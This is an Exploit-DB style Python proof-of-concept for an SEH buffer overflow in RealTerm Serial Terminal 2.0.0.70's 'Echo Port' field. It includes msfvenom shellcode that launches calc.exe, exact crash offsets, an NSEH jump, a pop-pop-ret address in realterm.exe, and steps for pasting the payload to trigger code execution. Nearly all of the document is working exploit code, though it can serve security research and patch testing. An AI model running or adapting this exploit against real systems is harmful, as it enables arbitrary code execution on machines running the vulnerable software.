RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

`#!/usr/bin/python  
  
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH)  
# Version: 2.0.0.70  
# Credits to: Alejandra Sanchez for finding initial DoS  
# https://www.exploit-db.com/exploits/46391  
# Matteo Malvica for creating initial PoC  
# https://www.exploit-db.com/exploits/46441  
# Differences: - Uses a larger space for shellcode, 260 bytes, due to more precise jumping and less NOP padding  
# - Filtered on char 0x3a representing ":", which causes "Invalid port" error in program   
# Date: 06-03-2019  
# Author: Hodorsec ([email protected] / [email protected])  
# Vendor Homepage: https://realterm.sourceforge.io/  
# Software Link: https://sourceforge.net/projects/realterm/files/   
# Tested on: Win7 x86 SP1 build 7601, Win8 6.3 build 9600   
# Caveats: SEHOP disabled in registry, although this is also true for PoC EDB-ID 46441 since the PoC wouldn't work otherwise  
  
# 1.- Run the python script it will create a new file as indicated by "filename" variable  
# 2.- Copy the content of the created file to clipboard  
# 3.- Open realterm.exe   
# 4.- Go to 'Echo Port' tab  
# 5.- Paste clipboard in 'Port' field  
# 6.- Click on button -> Change  
# 7.- Check 'Echo On'  
# 8.- Result  
  
import sys, struct  
  
filename = "sploit_realterm_custom-calc_x86.txt"  
  
# Shellcode  
# msfvenom -p windows/exec cmd=calc.exe -a x86 --platform windows -v shellcode -f python -b "\x0a\x0d\x00\x3a\x20"  
# Payload size: 220 bytes  
shellcode = ""  
shellcode += "\xbf\x83\xe7\x1e\x48\xd9\xec\xd9\x74\x24\xf4\x58"  
shellcode += "\x33\xc9\xb1\x31\x31\x78\x13\x03\x78\x13\x83\xc0"  
shellcode += "\x87\x05\xeb\xb4\x6f\x4b\x14\x45\x6f\x2c\x9c\xa0"  
shellcode += "\x5e\x6c\xfa\xa1\xf0\x5c\x88\xe4\xfc\x17\xdc\x1c"  
shellcode += "\x77\x55\xc9\x13\x30\xd0\x2f\x1d\xc1\x49\x13\x3c"  
shellcode += "\x41\x90\x40\x9e\x78\x5b\x95\xdf\xbd\x86\x54\x8d"  
shellcode += "\x16\xcc\xcb\x22\x13\x98\xd7\xc9\x6f\x0c\x50\x2d"  
shellcode += "\x27\x2f\x71\xe0\x3c\x76\x51\x02\x91\x02\xd8\x1c"  
shellcode += "\xf6\x2f\x92\x97\xcc\xc4\x25\x7e\x1d\x24\x89\xbf"  
shellcode += "\x92\xd7\xd3\xf8\x14\x08\xa6\xf0\x67\xb5\xb1\xc6"  
shellcode += "\x1a\x61\x37\xdd\xbc\xe2\xef\x39\x3d\x26\x69\xc9"  
shellcode += "\x31\x83\xfd\x95\x55\x12\xd1\xad\x61\x9f\xd4\x61"  
shellcode += "\xe0\xdb\xf2\xa5\xa9\xb8\x9b\xfc\x17\x6e\xa3\x1f"  
shellcode += "\xf8\xcf\x01\x6b\x14\x1b\x38\x36\x72\xda\xce\x4c"  
shellcode += "\x30\xdc\xd0\x4e\x64\xb5\xe1\xc5\xeb\xc2\xfd\x0f"  
shellcode += "\x48\x3c\xb4\x12\xf8\xd5\x11\xc7\xb9\xbb\xa1\x3d"  
shellcode += "\xfd\xc5\x21\xb4\x7d\x32\x39\xbd\x78\x7e\xfd\x2d"  
shellcode += "\xf0\xef\x68\x52\xa7\x10\xb9\x31\x26\x83\x21\x98"  
shellcode += "\xcd\x23\xc3\xe4"  
  
# Maximum length  
maxlen = 1000  
  
# Crash offsets  
crash_nseh = 268  
crash_seh = crash_nseh + 4  
  
# JMP offset  
ret_jmp = 262  
  
# Padding  
pad = "\x90" * 2  
  
# Variables  
prefix = pad # Initial padding  
prefix += shellcode # Custom shellcode, max size 260 bytes  
prefix += "B" * (ret_jmp - len(prefix)) # Filler until return point of negative jump  
prefix += "\xE9\xF7\xFE\xFF\xFF" # JMP 0xFFFFFEFC # Jmp to beginning of buffer  
prefix += "C" * (crash_nseh - len(prefix)) # Filler until return point of NSEH negative jump  
nseh = "\xeb\xf8\x90\x90" # JMP SHORT 0x8 # NOP # NOP  
seh = struct.pack("<L", 0x00406e27) # pop ecx # pop ebp # ret 0x04 # realterm.exe  
suffix = "D" * (maxlen - len(prefix + nseh + seh)) # Just filling  
  
# Constructing payload  
payload = prefix + nseh + seh + suffix  
  
f = open(filename, 'wb')  
f.write(payload)  
f.close()  
  
`